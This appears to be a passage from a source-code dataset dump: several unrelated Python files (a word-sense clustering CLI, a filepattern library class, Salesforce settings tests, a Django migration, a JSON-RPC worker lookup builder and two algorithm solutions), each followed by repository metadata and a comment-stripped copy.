import wordfreq
from senseclust.tables import metadata, freqs
from senseclust.groupings import gen_groupings
from senseclust.utils.clust import split_line, is_wn_ref
from os.path import basename
import itertools
from nltk.tokenize import word_tokenize
from nltk.corpus import wordnet
@click.group()
def man_clus():
pass
@man_clus.command()
@click.argument("words", type=click.File('r'))
@click.argument("out_dir")
def gen(words, out_dir):
session = get_session()
for word in words:
word_pos = word.split("#")[0].strip()
word, pos = word_pos.split(".")
assert pos == "Noun"
with open(pjoin(out_dir, word_pos), "w") as outf:
results = session.execute(select([
word_sense.c.sense_id,
word_sense.c.etymology_index,
word_sense.c.sense,
word_sense.c.extra,
]).select_from(joined).where(
(headword.c.name == word) &
(word_sense.c.pos == "Noun")
).order_by(word_sense.c.etymology_index)).fetchall()
prev_ety = None
for row in results:
if prev_ety is not None and row["etymology_index"] != prev_ety:
outf.write("\n")
outf.write("{} # {}\n".format(row["sense_id"], row["extra"]["raw_defn"].strip().replace("\n", " --- ")))
prev_ety = row["etymology_index"]
for synset_id, lemma_objs in get_lemma_objs(word, WORDNETS, "n").items():
wordnets = {wn for wn, _ in lemma_objs}
outf.write("\n")
outf.write("{} # [{}] {}\n".format(pre_id_to_post(synset_id), ", ".join(wordnets), annotation_comment(lemma_objs)))
@man_clus.command()
def add_freq_data():
session = get_session()
metadata.create_all(session().get_bind().engine)
with click.progressbar(wordfreq.get_frequency_dict("fi").items(), label="Inserting frequencies") as name_freqs:
for name, freq in name_freqs:
insert(session, freqs, name=name, freq=freq)
session.commit()
@man_clus.command()
@click.argument("infs", nargs=-1)
@click.argument("out", type=click.File('w'))
def compile(infs, out):
out.write("manann,ref\n")
for inf in infs:
word_pos = basename(inf)
word = word_pos.split(".")[0]
idx = 1
with open(inf) as f:
for line in f:
if not line.strip():
idx += 1
else:
ref = line.split("#")[0].strip()
out.write(f"{word}.{idx:02d},{ref}\n")
@man_clus.command()
@click.argument("inf", type=click.File('r'))
@click.argument("out_dir")
def decompile(inf, out_dir):
session = get_session()
for lemma, grouping in gen_groupings(inf):
with open(pjoin(out_dir, lemma), "w") as outf:
first = True
for group_num, synsets in grouping.items():
if not first:
outf.write("\n")
else:
first = False
for synset in synsets:
outf.write(synset)
outf.write(" # ")
if is_wn_ref(synset):
sense = wordnet.of2ss(synset).definition()
else:
sense = session.execute(select([
word_sense.c.sense,
]).select_from(joined).where(
(headword.c.name == lemma) &
(word_sense.c.sense_id == synset)
)).fetchone()["sense"]
tokens = word_tokenize(sense)
outf.write(" ".join(tokens))
outf.write("\n")
@man_clus.command()
@click.argument("inf", type=click.File('r'))
@click.argument("outf", type=click.File('w'))
@click.option('--filter', type=click.Choice(['wn', 'wiki', 'link']))
def filter(inf, outf, filter):
assert inf.readline().strip() == "manann,ref"
outf.write("manann,ref\n")
if filter in ("wn", "wiki"):
for line in inf:
manann, ref = line.strip().split(",")
if ((filter == "wn") and not is_wn_ref(ref)) or \
((filter == "wiki") and is_wn_ref(ref)):
continue
outf.write(line)
else:
groups = itertools.groupby((split_line(line) for line in inf), lambda tpl: tpl[0])
for lemma, group in groups:
wn_grp = []
wiki_grp = []
for tpl in group:
if is_wn_ref(tpl[2]):
wn_grp.append(tpl)
else:
wiki_grp.append(tpl)
grp_idx = 1
for _, f1, lid1 in wn_grp:
for _, f2, lid2 in wiki_grp:
if f1 == f2:
outf.write(f"{lemma}.{grp_idx:02d}.01,{lid1}\n")
outf.write(f"{lemma}.{grp_idx:02d}.01,{lid2}\n")
else:
outf.write(f"{lemma}.{grp_idx:02d}.01,{lid1}\n")
outf.write(f"{lemma}.{grp_idx:02d}.02,{lid2}\n")
grp_idx += 1
@man_clus.command()
@click.argument("limit", required=False, type=int)
@click.option("--verbose/--no-verbose")
def pick_words(limit=50, verbose=False):
query = select([
headword.c.name,
freqs.c.freq,
]).select_from(joined_freq).where(
word_sense.c.etymology_index.isnot(None) &
(word_sense.c.pos == "Noun") &
word_sense.c.inflection_of_id.is_(None)
).group_by(
headword.c.id
).having(
count(
distinct(word_sense.c.etymology_index)
) > 1
).order_by(freqs.c.freq.desc()).limit(limit)
session = get_session()
candidates = session.execute(query).fetchall()
for word, freq in candidates:
print(word + ".Noun", "#", freq)
if verbose:
print("\n")
for word, _ in candidates:
print("#", word)
pprint(session.execute(select([
word_sense.c.sense_id,
word_sense.c.sense,
]).select_from(joined).where(
headword.c.name == word
)).fetchall())
if __name__ == "__main__":
man_clus()
| true
| true
|
f718f70961bab8dab9071693156e930da601e4b4
| 10,851
|
py
|
Python
|
utils/polus-filepattern-util/filepattern/classes.py
|
Vishakha6/polus-plugins
|
ff6a31d5a6b78a26378745719f19d3e724e25670
|
[
"MIT"
] | 1
|
2021-07-23T20:46:18.000Z
|
2021-07-23T20:46:18.000Z
|
utils/polus-filepattern-util/filepattern/classes.py
|
Vishakha6/polus-plugins
|
ff6a31d5a6b78a26378745719f19d3e724e25670
|
[
"MIT"
] | 2
|
2021-07-13T16:20:31.000Z
|
2021-08-20T11:21:34.000Z
|
utils/polus-filepattern-util/filepattern/classes.py
|
gauharbains/polus-plugins
|
5e4d1e33bb61d7619d3a76fb7c115d475628a909
|
[
"MIT"
] | 3
|
2021-08-04T15:45:53.000Z
|
2022-03-09T19:03:57.000Z
|
import copy, pathlib, typing, abc
from filepattern.functions import get_regex, get_matching, parse_directory, \
parse_vector, logger, VARIABLES, output_name, \
_parse, parse_filename
class PatternObject():
    """Abstract base class for handling filepatterns.

    Wraps the filepattern parsing functions behind a simpler interface. In
    particular, calling the object returns an iterable that yields lists of
    file dictionaries grouped by any combination of variables.
    """

    def __init__(self,
                 file_path: typing.Union[pathlib.Path, str],
                 pattern: str,
                 var_order: str = "rtczyxp"):
        """Initialize a Pattern object.

        Args:
            file_path: Path to directory or file to parse.
            pattern: A filepattern string.
            var_order: Dictionary nesting order; characters limited to
                :any:`VARIABLES`. Defaults to "rtczyxp".
        """
        self.files = {}
        self.uniques = {}
        # Iteration state set by __call__ and consumed (then cleared) by __iter__.
        self._kwargs = None
        self._group_by = None
        self.pattern = pattern
        self.regex, self.variables = get_regex(pattern)
        self.path = file_path
        # Keep only the ordering characters actually present in the pattern.
        self.var_order = "".join([v for v in var_order if v in self.variables])
        self.files, self.uniques = self.parse_data(file_path)

    def __call__(self, group_by: list = [], **kwargs) -> typing.Iterable[typing.List[dict]]:
        """Configure iteration and return self as the iterable.

        Each iteration yields a list of filenames sharing constant values for
        every variable except those named in ``group_by``.

        Args:
            group_by: Variables by which output filenames will be grouped.
            **kwargs: Uppercase variable letters mapped to an int or a list of
                ints restricting the matched values (see :any:`get_matching`).

        Returns:
            Iterable that returns lists of files with matching variables.
        """
        self._group_by = group_by
        self._kwargs = kwargs
        return self

    @abc.abstractmethod
    def parse_data(self, file_path: str) -> dict:
        """Parse data in a directory.

        Must return a nested dictionary in the same format as
        :any:`parse_directory`.

        Args:
            file_path: Path to target file directory to parse.

        Returns:
            A nested dictionary of file dictionaries.
        """

    def output_name(self, files: typing.List[dict] = []) -> str:
        """Determine an output name summarizing the variables of ``files``.

        When ``files`` is empty, all files parsed by this object are used.
        See :any:`output_name` for details.

        Args:
            files: A list of file dictionaries.

        Returns:
            An output file name.
        """
        if len(files) == 0:
            files = self.files
        # Flatten into a list of file dicts (unique values match everything).
        files = get_matching(files, self.var_order,
                             **{k.upper(): v for k, v in self.uniques.items()})
        # Collect the set of observed values per variable.
        vals = {v: set() for v in self.var_order}
        for file in files:
            for k, v in file.items():
                if k not in self.var_order:
                    continue
                vals[k].add(v)
        # Pin variables that take exactly one (present, i.e. != -1) value.
        kwargs = {}
        for k, v in vals.items():
            v = list(v)
            if len(v) == 1 and v[0] != -1:
                kwargs[k] = v[0]
        return output_name(self.pattern, files, kwargs)

    def get_matching(self, **kwargs):
        """Get all filenames matching specific values.

        Args:
            **kwargs: One of :any:`VARIABLES`, must be uppercase; single
                values or a list of values.

        Returns:
            A list of all files matching the input values.
        """
        return get_matching(self.files, self.var_order, out_var=None, **kwargs)

    def __iter__(self):
        # Consume and reset the state configured by __call__.
        group_by = self._group_by
        kwargs = self._kwargs
        self._group_by = None
        self._kwargs = None
        if kwargs is None:
            kwargs = {}
        if group_by is None:
            group_by = ''
        # If self.files is a list, no parsing took place, so just loop through the files.
        if isinstance(self.files, list):
            for f in self.files:
                yield [f]
            return
        # Generate the values to iterate through for each non-grouped variable.
        iter_vars = {}
        for v in self.var_order:
            if v in group_by:
                # Grouping variables are not iterated individually.
                continue
            elif v.upper() in kwargs.keys():
                # Copy user-supplied values since they are modified below.
                if isinstance(kwargs[v.upper()], list):
                    iter_vars[v] = copy.deepcopy(kwargs[v.upper()])
                else:
                    iter_vars[v] = [kwargs[v.upper()]]
            else:
                iter_vars[v] = copy.deepcopy(self.uniques[v])
        # Find the shallowest variable: the first whose values actually occur
        # in the file names (-1 marks a variable absent from the names).
        shallowest = None
        for v in iter_vars.keys():
            if -1 in iter_vars[v] and len(iter_vars[v]):
                continue
            else:
                shallowest = v
                break
        # If shallowest is undefined, return all file names since no variables
        # were found in any of the file names.
        if shallowest is None:
            yield get_matching(self.files, self.var_order,
                               **{key.upper(): iter_vars[key][0] for key in iter_vars.keys()})
            return
        # Loop through every combination of variable values.
        while len(iter_vars[shallowest]) > 0:
            iter_files = get_matching(self.files, self.var_order,
                                      **{key.upper(): iter_vars[key][0] for key in iter_vars.keys()})
            if len(iter_files) > 0:
                yield iter_files
            # Advance: delete the last-used index, odometer-style.
            for v in reversed(self.var_order):
                if v in group_by:
                    continue
                del iter_vars[v][0]
                if len(iter_vars[v]) > 0:
                    break
                elif v == shallowest:
                    # Exhausted the outermost variable: the while loop ends.
                    break
                # Reset this variable and carry over to the next one.
                iter_vars[v] = copy.deepcopy(self.uniques[v])
class FilePattern(PatternObject):
    """Concrete :any:`PatternObject` backed by a directory of files.

    Iteration behaves exactly as in the base class; only the parsing step
    differs, delegating to :any:`parse_directory`.
    """

    def parse_data(self, file_path: typing.Union[pathlib.Path, str]) -> dict:
        """Parse the files under ``file_path``.

        Args:
            file_path: Path to target file directory to parse.

        Returns:
            A nested dictionary of file dictionaries.
        """
        return parse_directory(
            file_path,
            regex=self.regex,
            variables=self.variables,
            var_order=self.var_order,
        )
class VectorPattern(PatternObject):
    """:any:`PatternObject` that parses lines of a stitching vector.

    Works nearly identically to :any:`FilePattern`, but iteration yields
    parsed stitching-vector lines. Note that the ``file`` values in the file
    dictionaries hold strings rather than ``pathlib.Path`` objects.
    """

    def parse_data(self, file_path: typing.Union[pathlib.Path, str]):
        """Parse the stitching vector at ``file_path``.

        Args:
            file_path: Path to target stitching vector to parse.

        Returns:
            A nested dictionary of file dictionaries.
        """
        return parse_vector(
            file_path,
            regex=self.regex,
            variables=self.variables,
            var_order=self.var_order,
        )
| 38.478723
| 126
| 0.589531
|
import copy, pathlib, typing, abc
from filepattern.functions import get_regex, get_matching, parse_directory, \
parse_vector, logger, VARIABLES, output_name, \
_parse, parse_filename
class PatternObject():
def __init__(self,
file_path: typing.Union[pathlib.Path,str],
pattern: str,
var_order: str = "rtczyxp"):
self.files = {}
self.uniques = {}
self._kwargs = None
self._group_by = None
self.pattern = pattern
self.regex, self.variables = get_regex(pattern)
self.path = file_path
self.var_order = var_order
self.var_order = "".join([v for v in self.var_order if v in self.variables])
self.files, self.uniques = self.parse_data(file_path)
def __call__(self,group_by: list = [],**kwargs) -> typing.Iterable[typing.List[dict]]:
self._group_by = group_by
self._kwargs = kwargs
return self
@abc.abstractmethod
def parse_data(self,file_path: str) -> dict:
def output_name(self,files:typing.List[dict] = []) -> str:
if len(files) == 0:
files = self.files
files = get_matching(files,self.var_order,**{k.upper():v for k,v in self.uniques.items()})
vals = {v:set() for v in self.var_order}
for file in files:
for k,v in file.items():
if k not in self.var_order:
continue
vals[k].add(v)
kwargs = {}
for k,v in vals.items():
v = list(v)
if len(v) == 1 and v[0] != -1:
kwargs[k] = v[0]
return output_name(self.pattern,files,kwargs)
def get_matching(self,**kwargs):
files = get_matching(self.files,self.var_order,out_var=None,**kwargs)
return files
def __iter__(self):
group_by = self._group_by
kwargs = self._kwargs
self._group_by = None
self._kwargs = None
if kwargs == None:
kwargs = {}
if group_by == None:
group_by = ''
if isinstance(self.files,list):
for f in self.files:
yield [f]
return
iter_vars = {}
for v in self.var_order:
if v in group_by:
continue
elif v.upper() in kwargs.keys():
if isinstance(kwargs[v.upper()],list):
iter_vars[v] = copy.deepcopy(kwargs[v.upper()])
else:
iter_vars[v] = [kwargs[v.upper()]]
else:
iter_vars[v] = copy.deepcopy(self.uniques[v])
shallowest = None
for v in iter_vars.keys():
if -1 in iter_vars[v] and len(iter_vars[v]):
continue
else:
shallowest = v
break
# If shallowest is undefined, return all file names since no variables
# were found in any of the file names
if shallowest == None:
yield get_matching(self.files,self.var_order,**{key.upper():iter_vars[key][0] for key in iter_vars.keys()})
return
# Loop through every combination of files
while len(iter_vars[shallowest])>0:
# Get list of filenames and return as iterator
iter_files = []
iter_files = get_matching(self.files,self.var_order,**{key.upper():iter_vars[key][0] for key in iter_vars.keys()})
if len(iter_files)>0:
yield iter_files
# Delete last iteration indices
for v in reversed(self.var_order):
if v in group_by:
continue
del iter_vars[v][0]
if len(iter_vars[v])>0:
break
elif v == shallowest:
break
iter_vars[v] = copy.deepcopy(self.uniques[v])
class FilePattern(PatternObject):
def parse_data(self,file_path: typing.Union[pathlib.Path,str]) -> dict:
return parse_directory(file_path,regex=self.regex,variables=self.variables,var_order=self.var_order)
class VectorPattern(PatternObject):
def parse_data(self,file_path: typing.Union[pathlib.Path,str]):
return parse_vector(file_path,regex=self.regex,variables=self.variables,var_order=self.var_order)
| true
| true
|
f718f7738c7e7e56290c2c143c5634263a7cef6f
| 2,697
|
py
|
Python
|
cumulusci/tasks/preflight/tests/test_settings.py
|
atrancandoris/CumulusCI
|
cc468ea315af2dd8c11b67f9316af65530d0f4bc
|
[
"BSD-3-Clause"
] | 1
|
2020-12-04T10:29:31.000Z
|
2020-12-04T10:29:31.000Z
|
cumulusci/tasks/preflight/tests/test_settings.py
|
ThierryFeltin/CumulusCI
|
80fece4ea526c3c531fbb3fd9a8ec56e6fa80d14
|
[
"BSD-3-Clause"
] | null | null | null |
cumulusci/tasks/preflight/tests/test_settings.py
|
ThierryFeltin/CumulusCI
|
80fece4ea526c3c531fbb3fd9a8ec56e6fa80d14
|
[
"BSD-3-Clause"
] | null | null | null |
from cumulusci.tasks.preflight.settings import CheckSettingsValue
from cumulusci.tasks.salesforce.tests.util import create_task
from simple_salesforce.exceptions import SalesforceMalformedRequest
import pytest
import responses
# Canned Tooling-API query payload: a single ChatterSettings record exposing
# one field of each scalar type exercised by the parametrized test.
JSON_RESPONSE = {
    "records": [{"IntVal": 3, "FloatVal": 3.0, "BoolVal": True, "StringVal": "foo"}],
    "done": True,
    "totalSize": 1,
}
@responses.activate
@pytest.mark.parametrize(
    "settings_field,value,outcome",
    [
        ("IntVal", 3, True),
        ("FloatVal", 3.0, True),
        ("BoolVal", "true", True),
        ("StringVal", "foo", True),
        ("StringVal", "bad", False),
    ],
)
def test_check_settings(settings_field, value, outcome):
    """CheckSettingsValue returns whether the queried field equals the expected value."""
    # Mock the Tooling API query that the task issues for the field.
    responses.add(
        "GET",
        f"https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+{settings_field}+FROM+ChatterSettings",
        json=JSON_RESPONSE,
    )
    task = create_task(
        CheckSettingsValue,
        {
            "settings_type": "ChatterSettings",
            "settings_field": settings_field,
            "value": value,
        },
    )
    task()
    assert task.return_values is outcome
@responses.activate
def test_check_settings__no_settings():
responses.add(
"GET",
"https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+Foo+FROM+ChatterSettings",
json={"records": []},
)
task = create_task(
CheckSettingsValue,
{
"settings_type": "ChatterSettings",
"settings_field": "Foo",
"value": True,
},
)
task()
assert task.return_values is False
@responses.activate
def test_check_settings__failure():
responses.add(
"GET",
status=400,
url="https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+Test+FROM+NoSettings",
json={},
)
task = create_task(
CheckSettingsValue,
{
"settings_type": "NoSettings",
"settings_field": "Test",
"value": True,
"treat_missing_as_failure": True,
},
)
task()
assert task.return_values is False
@responses.activate
def test_check_settings__exception():
responses.add(
"GET",
status=400,
url="https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+Test+FROM+NoSettings",
json={},
)
task = create_task(
CheckSettingsValue,
{
"settings_type": "NoSettings",
"settings_field": "Test",
"value": True,
},
)
with pytest.raises(SalesforceMalformedRequest):
task()
assert task.return_values is False
| 23.867257
| 121
| 0.599184
|
from cumulusci.tasks.preflight.settings import CheckSettingsValue
from cumulusci.tasks.salesforce.tests.util import create_task
from simple_salesforce.exceptions import SalesforceMalformedRequest
import pytest
import responses
JSON_RESPONSE = {
"records": [{"IntVal": 3, "FloatVal": 3.0, "BoolVal": True, "StringVal": "foo"}],
"done": True,
"totalSize": 1,
}
@responses.activate
@pytest.mark.parametrize(
"settings_field,value,outcome",
[
("IntVal", 3, True),
("FloatVal", 3.0, True),
("BoolVal", "true", True),
("StringVal", "foo", True),
("StringVal", "bad", False),
],
)
def test_check_settings(settings_field, value, outcome):
responses.add(
"GET",
f"https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+{settings_field}+FROM+ChatterSettings",
json=JSON_RESPONSE,
)
task = create_task(
CheckSettingsValue,
{
"settings_type": "ChatterSettings",
"settings_field": settings_field,
"value": value,
},
)
task()
assert task.return_values is outcome
@responses.activate
def test_check_settings__no_settings():
responses.add(
"GET",
"https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+Foo+FROM+ChatterSettings",
json={"records": []},
)
task = create_task(
CheckSettingsValue,
{
"settings_type": "ChatterSettings",
"settings_field": "Foo",
"value": True,
},
)
task()
assert task.return_values is False
@responses.activate
def test_check_settings__failure():
responses.add(
"GET",
status=400,
url="https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+Test+FROM+NoSettings",
json={},
)
task = create_task(
CheckSettingsValue,
{
"settings_type": "NoSettings",
"settings_field": "Test",
"value": True,
"treat_missing_as_failure": True,
},
)
task()
assert task.return_values is False
@responses.activate
def test_check_settings__exception():
responses.add(
"GET",
status=400,
url="https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+Test+FROM+NoSettings",
json={},
)
task = create_task(
CheckSettingsValue,
{
"settings_type": "NoSettings",
"settings_field": "Test",
"value": True,
},
)
with pytest.raises(SalesforceMalformedRequest):
task()
assert task.return_values is False
| true
| true
|
f718f9f194730e615e7ec9ce3e7cb3a576ea5bd8
| 264
|
py
|
Python
|
text/_cascade/_typing/_dimension.py
|
jedhsu/text
|
8525b602d304ac571a629104c48703443244545c
|
[
"Apache-2.0"
] | null | null | null |
text/_cascade/_typing/_dimension.py
|
jedhsu/text
|
8525b602d304ac571a629104c48703443244545c
|
[
"Apache-2.0"
] | null | null | null |
text/_cascade/_typing/_dimension.py
|
jedhsu/text
|
8525b602d304ac571a629104c48703443244545c
|
[
"Apache-2.0"
] | null | null | null |
"""
Dimension
"""
from abc import ABCMeta
from dataclasses import dataclass
__all__ = ["Dimension"]
from .numeric import Number
from ._unit import UnitMeasure
@dataclass
class Dimension:
__metaclass__ = ABCMeta
number: Number
unit: UnitMeasure
| 12
| 33
| 0.734848
|
from abc import ABCMeta
from dataclasses import dataclass
__all__ = ["Dimension"]
from .numeric import Number
from ._unit import UnitMeasure
@dataclass
class Dimension:
__metaclass__ = ABCMeta
number: Number
unit: UnitMeasure
| true
| true
|
f718fa636465cb39461b7969d2924c94c71ba30c
| 814
|
py
|
Python
|
payment/migrations/0012_webhookevent.py
|
botent/django-stripe-paypal
|
3a768a6c45913513197f4f6b7044223ae96db716
|
[
"MIT"
] | 3
|
2021-07-29T16:27:49.000Z
|
2021-11-12T15:39:42.000Z
|
payment/migrations/0012_webhookevent.py
|
botent/django-stripe-paypal
|
3a768a6c45913513197f4f6b7044223ae96db716
|
[
"MIT"
] | null | null | null |
payment/migrations/0012_webhookevent.py
|
botent/django-stripe-paypal
|
3a768a6c45913513197f4f6b7044223ae96db716
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.5 on 2021-09-21 12:01
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('payment', '0011_alter_paymentorder_name'),
]
operations = [
migrations.CreateModel(
name='WebhookEvent',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('customer_id', models.CharField(max_length=200, verbose_name='Customer ID')),
('event_type', models.CharField(max_length=200, verbose_name='Event Type')),
('data_obj', models.JSONField(verbose_name='Data Object')),
('event_info', models.JSONField(verbose_name='Full Event Data')),
],
),
]
| 33.916667
| 117
| 0.608108
|
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('payment', '0011_alter_paymentorder_name'),
]
operations = [
migrations.CreateModel(
name='WebhookEvent',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('customer_id', models.CharField(max_length=200, verbose_name='Customer ID')),
('event_type', models.CharField(max_length=200, verbose_name='Event Type')),
('data_obj', models.JSONField(verbose_name='Data Object')),
('event_info', models.JSONField(verbose_name='Full Event Data')),
],
),
]
| true
| true
|
f718fa9de893038d5ae56ecc48f2dcaf85abea50
| 2,969
|
py
|
Python
|
tests/automation_framework/src/worker_lookup/worker_lookup_params.py
|
shresthichauhan/trusted-compute-framework
|
1ad89fa6fa4492f43bb79e1c9be3536c4f0ff7f7
|
[
"Apache-2.0"
] | null | null | null |
tests/automation_framework/src/worker_lookup/worker_lookup_params.py
|
shresthichauhan/trusted-compute-framework
|
1ad89fa6fa4492f43bb79e1c9be3536c4f0ff7f7
|
[
"Apache-2.0"
] | null | null | null |
tests/automation_framework/src/worker_lookup/worker_lookup_params.py
|
shresthichauhan/trusted-compute-framework
|
1ad89fa6fa4492f43bb79e1c9be3536c4f0ff7f7
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
logger = logging.getLogger(__name__)
class WorkerLookUp():
def __init__(self):
self.id_obj = {"jsonrpc": "2.0", "method": "WorkerLookUp", "id": 1}
self.params_obj = {}
self.request_mode = "file"
self.tamper = {"params": {}}
self.output_json_file_name = "worker_lookup"
def add_json_values(self, input_json_temp, tamper):
if "workerType" in input_json_temp["params"].keys():
if input_json_temp["params"]["workerType"] != "":
self.set_worker_type(input_json_temp["params"]["workerType"])
else:
self.set_worker_type(1)
if "id" in input_json_temp.keys():
self.set_request_id(input_json_temp["id"])
for key in tamper["params"].keys():
param = key
value = tamper["params"][key]
self.set_unknown_parameter(param, value)
def set_unknown_parameter(self, param, value):
self.params_obj[param] = value
def set_worker_type(self, worker_type):
self.params_obj["workerType"] = worker_type
def set_request_id(self, request_id):
self.id_obj["id"] = request_id
def get_params(self):
return self.params_obj.copy()
def to_string(self):
json_rpc_request = self.id_obj
json_rpc_request["params"] = self.get_params()
return json.dumps(json_rpc_request, indent=4)
def configure_data(
self, input_json, worker_obj, pre_test_response):
if input_json is None:
self.set_worker_type(1)
else:
self.add_json_values(input_json, self.tamper)
final_json = json.loads(self.to_string())
return final_json
def configure_data_sdk(
self, input_json, worker_obj, pre_test_response):
if input_json is None:
worker_type = 'SGX'
else:
try:
worker_value = input_json["params"]["workerType"]
if worker_value == 1:
worker_type = 'SGX'
elif worker_value == 2:
worker_type = 'MPC'
elif worker_value == 3:
worker_type = 'ZK'
else:
worker_type = worker_value
except LookupError:
worker_type = ""
return worker_type
| 31.924731
| 77
| 0.613675
|
import json
import logging
logger = logging.getLogger(__name__)
class WorkerLookUp():
def __init__(self):
self.id_obj = {"jsonrpc": "2.0", "method": "WorkerLookUp", "id": 1}
self.params_obj = {}
self.request_mode = "file"
self.tamper = {"params": {}}
self.output_json_file_name = "worker_lookup"
def add_json_values(self, input_json_temp, tamper):
if "workerType" in input_json_temp["params"].keys():
if input_json_temp["params"]["workerType"] != "":
self.set_worker_type(input_json_temp["params"]["workerType"])
else:
self.set_worker_type(1)
if "id" in input_json_temp.keys():
self.set_request_id(input_json_temp["id"])
for key in tamper["params"].keys():
param = key
value = tamper["params"][key]
self.set_unknown_parameter(param, value)
def set_unknown_parameter(self, param, value):
self.params_obj[param] = value
def set_worker_type(self, worker_type):
self.params_obj["workerType"] = worker_type
def set_request_id(self, request_id):
self.id_obj["id"] = request_id
def get_params(self):
return self.params_obj.copy()
def to_string(self):
json_rpc_request = self.id_obj
json_rpc_request["params"] = self.get_params()
return json.dumps(json_rpc_request, indent=4)
def configure_data(
self, input_json, worker_obj, pre_test_response):
if input_json is None:
self.set_worker_type(1)
else:
self.add_json_values(input_json, self.tamper)
final_json = json.loads(self.to_string())
return final_json
def configure_data_sdk(
self, input_json, worker_obj, pre_test_response):
if input_json is None:
worker_type = 'SGX'
else:
try:
worker_value = input_json["params"]["workerType"]
if worker_value == 1:
worker_type = 'SGX'
elif worker_value == 2:
worker_type = 'MPC'
elif worker_value == 3:
worker_type = 'ZK'
else:
worker_type = worker_value
except LookupError:
worker_type = ""
return worker_type
| true
| true
|
f718fb16220b88d0cf774ed5e6300836f3128f5c
| 1,055
|
py
|
Python
|
solutions/sliding_window_maximum/solution.py
|
ansonmiu0214/dsa-worked-solutions
|
88801d268b78506edd77e771c29b4c9f4ae0f59a
|
[
"MIT"
] | null | null | null |
solutions/sliding_window_maximum/solution.py
|
ansonmiu0214/dsa-worked-solutions
|
88801d268b78506edd77e771c29b4c9f4ae0f59a
|
[
"MIT"
] | null | null | null |
solutions/sliding_window_maximum/solution.py
|
ansonmiu0214/dsa-worked-solutions
|
88801d268b78506edd77e771c29b4c9f4ae0f59a
|
[
"MIT"
] | null | null | null |
from collections import deque
from typing import List
def maxSlidingWindow(nums: List[int], k: int) -> List[int]:
"""Return the max sliding window of size 'k' on 'nums'."""
maxWindow = []
# Keep track of the indices of the 'max' candidates.
# Elements are guaranteed to be in decreasing order.
maxIdxs = deque([0])
for i, num in enumerate(nums):
leftBoundary = i - k
while maxIdxs and maxIdxs[0] <= leftBoundary:
# Discard any maximum values not in scope of the window.
maxIdxs.popleft()
while maxIdxs and num >= nums[maxIdxs[-1]]:
# Discard any values smaller than 'num', as they won't be
# considered 'max candidates since 'num' is larger and also
# in the same window scope.
maxIdxs.pop()
maxIdxs.append(i)
# Sliding window for 'nums' begin at index 'k-1', i.e. where
# the window sees the first 'k' numbers.
if i >= k - 1:
maxWindow.append(nums[maxIdxs[0]])
return maxWindow
| 31.969697
| 71
| 0.602844
|
from collections import deque
from typing import List
def maxSlidingWindow(nums: List[int], k: int) -> List[int]:
maxWindow = []
maxIdxs = deque([0])
for i, num in enumerate(nums):
leftBoundary = i - k
while maxIdxs and maxIdxs[0] <= leftBoundary:
maxIdxs.popleft()
while maxIdxs and num >= nums[maxIdxs[-1]]:
# considered 'max candidates since 'num' is larger and also
maxIdxs.pop()
maxIdxs.append(i)
if i >= k - 1:
maxWindow.append(nums[maxIdxs[0]])
return maxWindow
| true
| true
|
f718fb322a11e301def104bf6bbcf5c5efdc385b
| 1,066
|
py
|
Python
|
algorithms/648. Replace Words.py
|
woozway/py3-leetcode
|
e51a9ce7a6bb3e35c0fcb8c8f4f6cd5763708dbf
|
[
"MIT"
] | 1
|
2020-12-02T13:54:30.000Z
|
2020-12-02T13:54:30.000Z
|
algorithms/648. Replace Words.py
|
woozway/py3-leetcode
|
e51a9ce7a6bb3e35c0fcb8c8f4f6cd5763708dbf
|
[
"MIT"
] | null | null | null |
algorithms/648. Replace Words.py
|
woozway/py3-leetcode
|
e51a9ce7a6bb3e35c0fcb8c8f4f6cd5763708dbf
|
[
"MIT"
] | null | null | null |
"""
1. Clarification
2. Possible solutions
- Prefix Hash
- Trie
3. Coding
4. Tests
"""
# T=O(sigma(wi^2)), S=O(n), wi=len(i-th word)
class Solution:
def replaceWords(self, dictionary: List[str], sentence: str) -> str:
def replace(word):
for i in range(1, len(word)):
if word[:i] in rootset:
return word[:i]
return word
rootset = set(dictionary)
return ' '.join(map(replace, sentence.split()))
# T=O(n), S=O(n)
class Solution:
def replaceWords(self, dictionary: List[str], sentence: str) -> str:
def replace(word):
cur = trie
for letter in word:
if letter not in cur or END in cur: break
cur = cur[letter]
return cur.get(END, word)
Trie = lambda: collections.defaultdict(Trie)
trie = Trie()
END = True
for root in dictionary:
functools.reduce(dict.__getitem__, root, trie)[END] = root
return ' '.join(map(replace, sentence.split()))
| 26.65
| 72
| 0.54878
|
class Solution:
def replaceWords(self, dictionary: List[str], sentence: str) -> str:
def replace(word):
for i in range(1, len(word)):
if word[:i] in rootset:
return word[:i]
return word
rootset = set(dictionary)
return ' '.join(map(replace, sentence.split()))
class Solution:
def replaceWords(self, dictionary: List[str], sentence: str) -> str:
def replace(word):
cur = trie
for letter in word:
if letter not in cur or END in cur: break
cur = cur[letter]
return cur.get(END, word)
Trie = lambda: collections.defaultdict(Trie)
trie = Trie()
END = True
for root in dictionary:
functools.reduce(dict.__getitem__, root, trie)[END] = root
return ' '.join(map(replace, sentence.split()))
| true
| true
|
f718fb6285f131a554f6e66796002cf04bdb687c
| 16,091
|
py
|
Python
|
rocrate/rocrate.py
|
sourav0220/ro-crate-py
|
e279fc7ddf188f0b22b671ab9c670f3333b477e1
|
[
"Apache-2.0"
